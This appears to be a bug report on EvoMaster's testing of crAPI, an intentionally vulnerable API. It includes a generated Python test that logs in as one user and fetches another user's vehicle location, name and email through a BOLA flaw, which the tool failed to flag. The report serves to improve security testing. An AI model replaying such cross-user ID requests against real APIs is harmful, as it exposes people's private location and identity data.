A false negative BOLA case on crAPI #1298
Description
The /identity/api/v2/vehicle/{vehicleId}/location endpoint is vulnerable to BOLA attacks as stated in Challenge 1. To test whether EvoMaster can find the vulnerability, I've run it (v4.0.0) on crAPI for 5 minutes. As a result, it could write a test that generates a valid request for the vulnerable endpoint with a valid vehicleId:
# Calls:
# (200) GET:/identity/api/v2/vehicle/{vehicleId}/location
@timeout_decorator.timeout(60)
def test_33_get_on_location_returns_object(self):
token_user1 = "Bearer "
headers = {}
headers["content-type"] = "application/json"
body = " { " + \
" \"email\": \"[email protected]\", " + \
" \"password\": \"Password3!\" " + \
" } "
res_user1 = requests \
.post(self.baseUrlOfSut + "/identity/api/auth/login",
headers=headers, data=body, allow_redirects=False)
token_user1 = token_user1 + res_user1.json()["token"]
headers = {}
headers["Authorization"] = token_user1 # user1
headers['Accept'] = "application/json"
res_0 = requests \
.get(self.baseUrlOfSut + "/identity/api/v2/vehicle/cd515c12-0fc1-48ae-8b61-9230b70a845b/location",
headers=headers, timeout=60)
assert res_0.status_code == 200
assert "application/json" in res_0.headers["content-type"]
assert res_0.json()["carId"] == "cd515c12-0fc1-48ae-8b61-9230b70a845b"
assert res_0.json()["vehicleLocation"]["latitude"] == "31.284788"
assert res_0.json()["vehicleLocation"]["longitude"] == "-92.471176"
assert res_0.json()["fullName"] == "Pogba"
assert res_0.json()["email"] == "[email protected]"
EvoMaster has passed the challenge by finding the exposed valid vehicle ID in the /community/api/v2/community/posts/{postId} endpoint, and it could access the vehicle ID (cd515c12-0fc1-48ae-8b61-9230b70a845b) of another user (Pobga). However, as seen in the following image, it couldn't raise the fault code (206) related to missed authorization checks, BOLA.
This is a false negative case, and the algorithm can be improved to resolve this problem.